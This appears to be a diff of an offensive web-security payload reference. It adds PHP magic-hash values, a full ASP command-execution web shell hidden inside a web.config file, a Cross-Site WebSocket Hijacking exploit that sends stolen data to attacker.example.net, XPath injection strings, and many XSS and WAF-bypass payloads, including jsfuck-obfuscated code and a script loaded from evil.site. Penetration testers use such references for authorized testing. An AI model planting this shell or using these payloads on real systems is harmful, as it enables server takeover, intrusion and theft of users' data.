If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float.
|
If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float.
|
||||||
|
|
||||||
| Hash | “Magic” Number / String | Magic Hash | Found By |
|
| Hash | “Magic” Number / String | Magic Hash | Found By / Description |
|
||||||
| ---- | -------------------------- |:---------------------------------------------:| -------------:|
|
| ---- | -------------------------- |:---------------------------------------------:| -------------:|
|
||||||
| MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
|
| MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
|
||||||
|
| MD5 | QNKCDZO | 0e830400451993494058024219903391 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
|
||||||
|
| MD5 | 0e1137126905 | 0e291659922323405260514745084877 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
|
||||||
|
| MD5 | 0e215962017 | 0e291242476940776845150308577824 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
|
||||||
|
| MD5 | 129581926211651571912466741651878684928 | 06da5430449f8f6f23dfc1276f722738 | Raw: ?T0D??o#??'or'8.N=? |
|
||||||
| SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
|
| SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
|
||||||
| SHA-224 | 10885164793773 | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) |
|
| SHA-224 | 10885164793773 | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) |
|
||||||
| SHA-256 | 34250003024812 | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) |
|
| SHA-256 | 34250003024812 | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) |
|
||||||
|
|
|
@ -0,0 +1,65 @@
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<configuration>
|
||||||
|
<system.webServer>
|
||||||
|
<handlers accessPolicy="Read, Script, Write">
|
||||||
|
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
|
||||||
|
</handlers>
|
||||||
|
<security>
|
||||||
|
<requestFiltering>
|
||||||
|
<fileExtensions>
|
||||||
|
<remove fileExtension=".config" />
|
||||||
|
</fileExtensions>
|
||||||
|
<hiddenSegments>
|
||||||
|
<remove segment="web.config" />
|
||||||
|
</hiddenSegments>
|
||||||
|
</requestFiltering>
|
||||||
|
</security>
|
||||||
|
</system.webServer>
|
||||||
|
</configuration>
|
||||||
|
<!--
|
||||||
|
<% Response.write("-"&"->")%>
|
||||||
|
<%
|
||||||
|
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
|
||||||
|
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
|
||||||
|
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
|
||||||
|
|
||||||
|
Function getCommandOutput(theCommand)
|
||||||
|
Dim objShell, objCmdExec
|
||||||
|
Set objShell = CreateObject("WScript.Shell")
|
||||||
|
Set objCmdExec = objshell.exec(thecommand)
|
||||||
|
|
||||||
|
getCommandOutput = objCmdExec.StdOut.ReadAll
|
||||||
|
end Function
|
||||||
|
%>
|
||||||
|
|
||||||
|
<BODY>
|
||||||
|
<FORM action="" method="GET">
|
||||||
|
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
|
||||||
|
<input type="submit" value="Run">
|
||||||
|
</FORM>
|
||||||
|
|
||||||
|
<PRE>
|
||||||
|
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
|
||||||
|
<%Response.Write(Request.ServerVariables("server_name"))%>
|
||||||
|
<p>
|
||||||
|
<b>The server's port:</b>
|
||||||
|
<%Response.Write(Request.ServerVariables("server_port"))%>
|
||||||
|
</p>
|
||||||
|
<p>
|
||||||
|
<b>The server's software:</b>
|
||||||
|
<%Response.Write(Request.ServerVariables("server_software"))%>
|
||||||
|
</p>
|
||||||
|
<p>
|
||||||
|
<b>The server's software:</b>
|
||||||
|
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
|
||||||
|
<% szCMD = request("cmd")
|
||||||
|
thisDir = getCommandOutput("cmd /c" & szCMD)
|
||||||
|
Response.Write(thisDir)%>
|
||||||
|
</p>
|
||||||
|
<br>
|
||||||
|
</BODY>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<%Response.write("<!-"&"-") %>
|
||||||
|
-->
|
|
@ -65,6 +65,9 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm
|
||||||
* `Content-Type : image/gif`
|
* `Content-Type : image/gif`
|
||||||
* `Content-Type : image/png`
|
* `Content-Type : image/png`
|
||||||
* `Content-Type : image/jpeg`
|
* `Content-Type : image/jpeg`
|
||||||
|
- [Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures)
|
||||||
|
|
||||||
|
Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.
|
||||||
|
|
||||||
### Picture upload with LFI
|
### Picture upload with LFI
|
||||||
|
|
||||||
|
|
|
@ -31,6 +31,33 @@ Then you can use any tools against the newly created web service, working as a p
|
||||||
sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump
|
sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Cross-Site WebSocket Hijacking (CSWSH)
|
||||||
|
|
||||||
|
If the WebSocket handshake is not correctly protected using a CSRF token or a
|
||||||
|
nonce, it's possible to use the authenticated WebSocket of a user on an
|
||||||
|
attacker's controlled site because the cookies are automatically sent by the
|
||||||
|
browser. This attack is called Cross-Site WebSocket Hijacking (CSWSH).
|
||||||
|
|
||||||
|
Example exploit, hosted on an attacker's server, that exfiltrates the received
|
||||||
|
data from the WebSocket to the attacker:
|
||||||
|
|
||||||
|
```html
|
||||||
|
<script>
|
||||||
|
ws = new WebSocket('wss://vulnerable.example.com/messages');
|
||||||
|
ws.onopen = function start(event) {
|
||||||
|
websocket.send("HELLO");
|
||||||
|
}
|
||||||
|
ws.onmessage = function handleReply(event) {
|
||||||
|
fetch('https://attacker.example.net/?'+event.data, {mode: 'no-cors'});
|
||||||
|
}
|
||||||
|
ws.send("Some text sent to the server");
|
||||||
|
</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
You have to adjust the code to your exact situation. E.g. if your web
|
||||||
|
application uses a `Sec-WebSocket-Protocol` header in the handshake request,
|
||||||
|
you have to add this value as a 2nd parameter to the `WebSocket` function call
|
||||||
|
in order to add this header.
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
|
|
|
@ -28,6 +28,9 @@ x' or name()='username' or 'x'='y
|
||||||
' and count(/*)=1 and '1'='1
|
' and count(/*)=1 and '1'='1
|
||||||
' and count(/@*)=1 and '1'='1
|
' and count(/@*)=1 and '1'='1
|
||||||
' and count(/comment())=1 and '1'='1
|
' and count(/comment())=1 and '1'='1
|
||||||
|
search=')] | //user/*[contains(*,'
|
||||||
|
search=Har') and contains(../password,'c
|
||||||
|
search=Har') and starts-with(../password,'c
|
||||||
```
|
```
|
||||||
|
|
||||||
## Blind Exploitation
|
## Blind Exploitation
|
||||||
|
|
After Width: | Height: | Size: 1.1 KiB |
After Width: | Height: | Size: 1.1 KiB |
After Width: | Height: | Size: 32 KiB |
After Width: | Height: | Size: 44 KiB |
After Width: | Height: | Size: 28 KiB |
After Width: | Height: | Size: 39 KiB |
After Width: | Height: | Size: 27 KiB |
|
@ -39,6 +39,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
|
||||||
- [Bypass using an alternate way to redirect](#bypass-unsing-an-alternate-way-to-redirect)
|
- [Bypass using an alternate way to redirect](#bypass-unsing-an-alternate-way-to-redirect)
|
||||||
- [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert)
|
- [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert)
|
||||||
- [Bypass ">" using nothing](#bypass----using-nothing)
|
- [Bypass ">" using nothing](#bypass----using-nothing)
|
||||||
|
- [Bypass "<" using <](#bypass----using-<)
|
||||||
- [Bypass ";" using another character](#bypass-using------using-another-character)
|
- [Bypass ";" using another character](#bypass-using------using-another-character)
|
||||||
- [Bypass using HTML encoding](#bypass-using-html-encoding)
|
- [Bypass using HTML encoding](#bypass-using-html-encoding)
|
||||||
- [Bypass using Katana](#bypass-using-katana)
|
- [Bypass using Katana](#bypass-using-katana)
|
||||||
|
@ -52,6 +53,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
|
||||||
- [Bypass using UTF-32](#bypass-using-utf---32)
|
- [Bypass using UTF-32](#bypass-using-utf---32)
|
||||||
- [Bypass using BOM](#bypass-using-bom)
|
- [Bypass using BOM](#bypass-using-bom)
|
||||||
- [Bypass using weird encoding or native interpretation](#bypass-using-weird-encoding-or-native-interpretation)
|
- [Bypass using weird encoding or native interpretation](#bypass-using-weird-encoding-or-native-interpretation)
|
||||||
|
- [Bypass using jsfuck](#bypass-using-jsfuck)
|
||||||
- [CSP Bypass](#csp-bypass)
|
- [CSP Bypass](#csp-bypass)
|
||||||
- [Common WAF Bypass](#common-waf-bypass)
|
- [Common WAF Bypass](#common-waf-bypass)
|
||||||
|
|
||||||
|
@ -143,6 +145,7 @@ Svg payload
|
||||||
<svg id=alert(1) onload=eval(id)>
|
<svg id=alert(1) onload=eval(id)>
|
||||||
"><svg/onload=alert(String.fromCharCode(88,83,83))>
|
"><svg/onload=alert(String.fromCharCode(88,83,83))>
|
||||||
"><svg/onload=alert(/XSS/)
|
"><svg/onload=alert(/XSS/)
|
||||||
|
<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
|
||||||
|
|
||||||
Div payload
|
Div payload
|
||||||
<div onpointerover="alert(45)">MOVE HERE</div>
|
<div onpointerover="alert(45)">MOVE HERE</div>
|
||||||
|
@ -775,6 +778,12 @@ You don't need to close your tags.
|
||||||
<svg onload=alert(1)//
|
<svg onload=alert(1)//
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Bypass "<" using <
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
[̕h+͓.<script/src=//evil.site/poc.js>.͓̮̮ͅ=sW&͉̹̻͙̫̦̮̲͏̼̝̫́̕
|
||||||
|
```
|
||||||
|
|
||||||
### Bypass ";" using another character
|
### Bypass ";" using another character
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
|
@ -926,9 +935,17 @@ XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o
|
||||||
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
|
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Bypass using jsfuck
|
||||||
|
|
||||||
|
Bypass using [jsfuck](http://www.jsfuck.com/)
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
|
||||||
|
```
|
||||||
|
|
||||||
## CSP Bypass
|
## CSP Bypass
|
||||||
|
|
||||||
Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://appio.dev/vulns/google-csp-evaluator/)
|
Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://websecblog.com/vulns/google-csp-evaluator/)
|
||||||
|
|
||||||
### Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27))
|
### Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27))
|
||||||
|
|
||||||
|
@ -975,7 +992,27 @@ Works for CSP like `script-src 'self' data:`
|
||||||
|
|
||||||
## Common WAF Bypass
|
## Common WAF Bypass
|
||||||
|
|
||||||
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019
|
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
|
||||||
|
|
||||||
|
#### 21st april 2020
|
||||||
|
|
||||||
|
```html
|
||||||
|
<svg/OnLoad="`${prompt``}`">
|
||||||
|
```
|
||||||
|
|
||||||
|
#### 22nd august 2019
|
||||||
|
|
||||||
|
```html
|
||||||
|
<svg/onload=%26nbsp;alert`bohdan`+
|
||||||
|
```
|
||||||
|
|
||||||
|
#### 5th jule 2019
|
||||||
|
|
||||||
|
```html
|
||||||
|
1'"><img/src/onerror=.1|alert``>
|
||||||
|
```
|
||||||
|
|
||||||
|
#### 3rd june 2019
|
||||||
|
|
||||||
```html
|
```html
|
||||||
<svg onload=prompt%26%230000000040document.domain)>
|
<svg onload=prompt%26%230000000040document.domain)>
|
||||||
|
@ -1041,6 +1078,11 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
|
||||||
<a href=javascript:alert(1)>
|
<a href=javascript:alert(1)>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Fortiweb WAF Bypass by [@rezaduty](https://twitter.com/rezaduty) - 9th July 2019
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
|
||||||
|
```
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
|
@ -1108,3 +1150,5 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
|
||||||
- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
|
- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
|
||||||
- [XSS cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
|
- [XSS cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
|
||||||
- [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf)
|
- [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf)
|
||||||
|
- [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056)
|
||||||
|
- [Bypass < with <](https://hackerone.com/reports/639684)
|
||||||
|
|
|
@ -511,22 +511,22 @@ updating: xl/sharedStrings.xml (deflated 17%)
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
|
* [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
|
||||||
* [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html)
|
* [Detecting and exploiting XXE in SAML Interfaces](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) - 6. Nov. 2014 - Von Christian Mainka
|
||||||
* [staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4)
|
* [[Gist] staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4)
|
||||||
* [mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)
|
* [[Gist] mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)
|
||||||
* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 - Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf)
|
* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 - Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf)
|
||||||
* [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm)
|
